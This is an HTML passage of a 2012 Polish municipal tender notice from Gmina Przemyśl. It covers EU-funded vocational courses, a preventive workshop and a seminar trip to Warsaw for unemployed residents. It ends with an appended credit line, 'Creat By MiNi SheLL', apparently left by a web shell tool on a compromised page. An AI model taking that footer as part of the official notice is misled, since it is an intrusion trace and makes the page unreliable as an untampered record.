<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie umowy w sprawie zamówienia publicznego w części dotyczącej :

a) Zmiany kadry/ osób przewidzianych do realizacji przedmiotu zamówienia wykazanych      w zał. Nr 4 do SIWZ, Wykonawca zobowiązany będzie zapewnić zastępstwo przez osobę lub osoby o właściwych uprawnieniach, kwalifikacjach i doświadczeniu równym lub większym od doświadczenia osoby lub osób zastępowanych. Zastępca będzie mógł przystąpić do realizacji przedmiotu zamówienia przewidzianego w umowie po uzyskaniu przez Wnioskodawcę pisemnej zgody ze strony Zamawiającego. Wnioskując o zmianę kadry realizującej szkolenie, Wykonawca zobowiązany będzie wskazać: przyczyny nieobecności osoby zastępowanej, wskazać Zamawiającemu czynności, które będą przez tą osobę wykonywane,  kogo będzie miała zastąpić, okres zastępstwa, dołączyć oświadczenie, że wskazana osoba do zastępstwa posiada wymagane uprawnienia, kwalifikacje                         i doświadczenie 

b) Przesunięcia terminu płatności w przypadku nie otrzymania w terminie od Instytucji Zarządzającej Programem środków finansowych niezbędnych na ten cel. W takim przypadku zamawiający jest zwolniony z obowiązku zapłaty wykonawcy odsetek za zwłokę,

c) Terminu wykonania przedmiotu umowy - 
Warunkiem wprowadzenia zmiany terminu wykonania przedmiotu umowy jest wystąpienie okoliczności niezależnych od stron umowy, uniemożliwiających wykonanie umowy               w terminie pierwotnym. Obowiązek udokumentowania wystąpienia okoliczności uzasadniającej zmianę terminu wykonania przedmiotu umowy ciąży na stronie umowy wnioskującej o wprowadzenie zmiany. Za okoliczności uniemożliwiające wykonanie przedmiotu umowy w terminie uznaje się w szczególności działanie siły wyższej, opóźnienia związane z procesem rekrutacji uczestników szkolenia nie lezące po stronie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaprzemysl.home.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Przemyśl, 37-700 Przemyśl, ul. Borelowskiego 1, II piętro, pok. 208, lub barbara@gminaprzemysl.home.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2012 godzina 10:00, miejsce: Urząd Gminy Przemyśl, 37-700 Przemyśl, ul. Borelowskiego 1, sekretariat, pok. 202 II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecnego w ramach programu - Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kursy zawodowe,  warsztat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A/ Kurs koparko-ładowarki + walec  - 5 osób w terminie nie wcześniej niż 24.09.2012 r. nie później niż 15.11.2012 r. w  dni  robocze 8 godzin lekcyjnych dziennie.
 Program szkolenia ma zawierać:
                - 60 godzin zajęć praktycznych - koparko- ładowarki
	   - 34 godzin zajęć praktycznych - walec
                - 140 godzin  teoria
	   - 10 godzin BHP

Program kursu koparko - ładowarki +  walec  obejmuje również koszty badan lekarskich,
koszty zaświadczeń po ukończeniu kursu oraz koszty egzaminu po zakończeniu kursu ( wszystkie 
dokumenty muszą być oznakowane  zgodnie z wytycznymi dotyczącymi oznakowania projektu 
w ramach Programu Operacyjnego Kapitał Ludzki). Osoby szkolone mają mieć zapewnione materiały
 niezbędne do praktycznej nauki zawodu. Wykonawca dysponuje sprzętem koparko-ładowarką 
i walcem oraz placem manewrowym na którym będą odbywać się zajęcia praktyczne.

	B/ Kurs  fryzjer - kosmetyczka - dla 5 osób w terminie nie wcześniej niż 24.09.2012 r.   nie później niż 30.10.2012 r. w dni robocze do 8 godzin  lekcyjnych dziennie.
	Program szkolenia ma zawierać:
     - 40 godzin kosmetyczka;
     - 120 godzin fryzjer w tym 100 godzin praktyka;
     - 10 godzin BHP, etyka
     - 20 godzin obsługa klienta;
Program kursu fryzjer - kosmetyczka obejmuje również koszty badań lekarskich, zaświadczeń 
o ukończeniu kursu oraz koszty egzaminu po ukończeniu kursu (wszelkie dokumenty muszą być
oznakowane zgodnie z Wytycznymi dotyczącymi oznaczenia projektów  w ramach Programu
Operacyjnego Kapitał Ludzki). Osoby szkolone mają mieć zapewnione materiały niezbędne do
 praktycznej nauki zawodu.

C/  Usługi w postaci szkoleń grupowych dla 10 osób -  warsztat
      Warsztat przeprowadzony przez doradcę zawodowego dla 10 osób  w ilości 5
            godzin lekcyjnych w terminie nie wcześniej niż 20.09.2012  r. nie później niż do
            21.09.2012 r. przez jeden dzień roboczy 5 godzin lekcyjnych.
Program warsztatu obejmuje również koszty zaświadczenia ukończenia warsztatu (wszelka
dokumentacja prowadzona w związku z warsztatem musi zawierać oznakowanie zgodnie  
z Wytycznymi dotyczącymi oznaczania projektów w ramach  Programu Operacyjnego Kapitał Ludzki).

Ponadto Wykonawca na czas trwania poszczególnych zajęć musi zapewnić:
1. pomieszczenia do odbywania szkolenia przystosowane do liczby słuchaczy przewidzianych do szkolenia, posiadać zaplecze socjalne i sanitarne, posiadać sale wykładowe z oświetleniem naturalnym i sztucznym z odpowiednią ilością stołów 
i krzeseł, każdy z uczestników szkolenia w trakcie zajęć teoretycznych ma mieć zapewnione miejsce siedzące, w przypadku zajęć praktycznych w sali musi znajdować się odpowiedni sprzęt  i warunki do pracy;
2.  materiały szkoleniowe przygotowane dla każdego kursanta do 	każdego zakresu tematycznego ( oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki) oraz  długopis i kartki do notatek;
3. oznakowanie pomieszczeń, w których odbywać się będą zajęcia praktyczne i tematyczne zgodnie z wytycznymi dotyczącymi oznaczania  projektów w ramach Programu Operacyjnego Kapitał Ludzki;
4. catering w postaci napojów ( min. kawa, herbata i woda mineralna butelkowana niegazowana 
i gazowana) oraz obiad i suchy prowiant ( np. ciasteczka, herbatniki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztat.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> warsztat profilaktyczny dla 30 osób  w ilości 40 godzin  lekcyjnych na osobę     
             w terminie nie wcześniej niż 05.09.2012 r. i nie później niż 14.09.2012 r.  
             Dwie grupy po 15 osób.
		Program warsztatu ma zawierać:
		- trening interpersonalny;
		- problemy w rodzinie osób bezrobotnych ( uzależnienia, jako  źródło przemocy, 
                           konfliktów, problemów z partnerem, problemów z dziećmi);
		- praca nad własnymi emocjami i uczuciami;

Program obejmuje również koszty zaświadczeń o ukończeniu warsztatu. Poświadczenie ukończenia warsztatu i wszelka dokumentacja prowadzona w związku z warsztatem musi zawierać oznakowanie zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
		
Ponadto Wykonawca na czas trwania poszczególnych zajęć musi zapewnić:
1. pomieszczenia do odbywania szkolenia,
2. materiały szkoleniowe przygotowane dla każdego kursanta do każdego zakresu tematycznego 
( oznakowane zgodnie z wytycznymi dotyczącymi oznakowania projektów w ramach Programu Operacyjnego Kapitał Ludzki) oraz  długopis i kartki do notatek;
3. oznakowanie pomieszczeń, w których odbywać się będą zajęcia praktyczne i tematyczne zgodnie 
z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki;
4. catering w postaci napojów ( min. kawa, herbata i woda mineralna butelkowana gazowana i niegazowana) oraz obiad  i suchy prowiant ( np. ciasteczka, herbatniki).
Zamawiający wymaga, aby szkolenie było zorganizowane w odpowiednich pomieszczeniach  
z zapewnionym zapleczem do przeprowadzenia szkolenia dla osób dorosłych zgodnie  z wymogami
prawa polskiego, tj. posiadających odpowiednie warunki sanitarne bezpieczeństwa i higieny pracy,
akustyczne i jakościowe. Wymaga się, aby zajęcia odbywały się codziennie od poniedziałku do piątku.
Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę i niedzielę oraz w dniu ustawowo
wolne od pracy. Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin
lekcyjnych. Wykonawca winien zapewnić uczestnikom niezbędne narzędzia, urządzenia i sprzęt do
przeprowadzenia szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Seminarium wyjazdowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Seminarium wyjazdowe dla 40 osób 3 dniowe, w trakcie seminarium : zapoznanie się z funkcjonowaniem Stowarzyszenia KlonJawor w Warszawie (obszar działalności  w przypadku prowadzenia działalności gospodarczej zapoznanie uczestników ze specyfiką wytwarzania lub rodzajem usług świadczonych przez Stowarzyszenie itp.) trening zadaniowy Ładowanie akumulatora- 10 godzin lekcyjnych od 20.08.2012 r. - 31.08.2012 r. ( termin do ustalenia przez oferenta)
Cel:
- intensywna aktywizacja osobista i społeczna uczestników
- wzbudzenie zaangażowania w podejmowaniu atrakcyjnych wyznań
- twórcza integracja
- rozwijanie umiejętności współpracy zespołowej
- przeciwdziałanie wyuczonej bezradności i bezdecyzyjności
- odkrywanie i rozwijanie kompetencji osobistych i społecznych
- umacnianie poczucia samo skuteczności i efektywności w działaniu

Program wyjazdu:

I dzień - 	
wyjazd godz. 700 
		godz. 1200 -  1300  	obiad na trasie przejazdu
		godz. 1300 - 1600   	dojazd do miejsca zakwaterowania
		godz. 1600 - 1700    	zakwaterowanie w hotelu w promieniu do 30 km 
					od Warszawy
		godz. 1700  - 1800   	kolacja stół szwedzki
		godz. 1800  -  2000 	spotkanie  przedstawicielami Stowarzyszenia 
                                                                       KlonJawor w Warszawie (obszar działalności
                                                                       w przypadku prowadzenia działalności 
                                                                       gospodarczej, zapoznanie uczestników ze specyfiką
                                                                       wytwarzania lub rodzajem świadczonych usług)

            II dzień
		godz. 800		śniadanie stół szwedzki
		godz. 900 - 1300 	              warsztaty Ładowanie akumulatora cz. I 
                                                                       ( w dwóch grupach po 20 osób)
		godz. 1400 - 1500 	obiad
		godz. 1600 - 1900 	              warsztaty Ładowanie akumulatora cz. II
					( w dwóch grupach po 20 osób)
		godz. 1930 		kolacja stół szwedzki


III dzień
		godz. 800 		śniadanie stół szwedzki
		godz. 900 - 1300 	              zwiedzanie Warszawy: zajęcia integracyjno kulturalne 
		godz. 1300 - 1400 	obiad
		godz. 1430 - 2130	              powrót + kolacja w podróży	

1. Seminarium wyjazdowe skierowane jest do osób bezrobotnych i lub nieaktywnych zawodowo i lub niepełnosprawnych, będących w wieku aktywności zawodowej, korzystających ze świadczeń pomocy społecznej, zamieszkałych na terenie Gminy Przemyśl.
2. Zamawiający wymaga, aby program zajęć zawierał, co najmniej ww. zagadnienia.
3. Osoby biorące udział w seminarium wyjazdowym połączonym z treningiem zadaniowym Ładowanie akumulatora mają mieć zapewnione materiały niezbędne do przeprowadzenia zajęć. 	

4. Wykonawca zobowiązany jest zapewnić osobom uczestniczącym w seminarium wyjazdowym:
	- transport do/z miejsca pobytu, autokarem  ubezpieczonym oraz sprawnym technicznie,
- zakwaterowanie uczestników w hotelu na 2 doby hotelowe, zakwaterowanie  uczestników 
  winno odbyć się w pierwszym dniu przyjazdu,
- zakwaterowanie w odpowiednich warunkach ( pokoje max. 3 osobowe z pełnym węzłem
  sanitarnym),
- pełne wyżywienie w czasie pobytu ( śniadanie, obiad dwudaniowy z deserem, kolacja oraz 
  serwis kawowy tj.  kawa, herbata, ciastka, woda, soki w czasie spotkań i zajęć ( spotkanie 
  z przedstawicielami Stowarzyszenia, trening zadaniowy) 
- śniadanie i kolacja  stół szwedzki ( wędliny, pieczywo, masło, ser, dżem, jajecznica, parówki, 
   ciasto, kawa, herbata, napoje), 
-  obiad dwudaniowy z deserem na  osobę w każdym dniu, 
- serwis kawowy  podczas spotkania z przedstawicielami Stowarzyszenia i treningu
   zadaniowego.
- w ramach seminarium wyjazdowego wykonawca zapewni atrakcyjne formy spędzania czasu 
  wolnego ( dot. trzeciego dnia - zajęcia integracyjno kulturalne np. zwiedzanie Warszawy,
  sejm, senat ).
5. Czas szkolenia - trening zadaniowy Ładowanie akumulatora 10 godzin lekcyjnych
    ( zajęcia teoretyczne i praktyczne ogółem). Szkolenie może odbywać się w godz. 900 - 1900 
      z przerwą na obiad.
6. Seminarium wyjazdowe połączone z treningiem zadaniowym Ładowanie akumulatora, zwiedzaniem Stowarzyszenia KlonJawor zakończy się wydaniem dokumentów świadczących           o uczestnictwie w zorganizowanym w ramach wyjazdu zajęciach ( zaświadczeń, świadectw, certyfikatów itp.). Dokumenty te maja być wydane zgodnie z Rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz.U. Nr 31, poz. 216) i mieć logo Programu Operacyjnego Kapitał Ludzki w zestawieniu       z logo Unii Europejskiej oraz nazwę projektu, z którego finansowane jest szkolenie. 
7. Do realizacji zajęć wykonawca zapewni ich uczestnikom odpowiednie  wyposażenie techniczne adekwatne do rodzaju treningu odpowiadające indywidualnym potrzebom szkoleniowym uczestnika. W przypadku zajęć praktycznych musi być zapewniony odpowiedni sprzęt i warunki do pracy w grupach zgodnie ze specyfiką szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com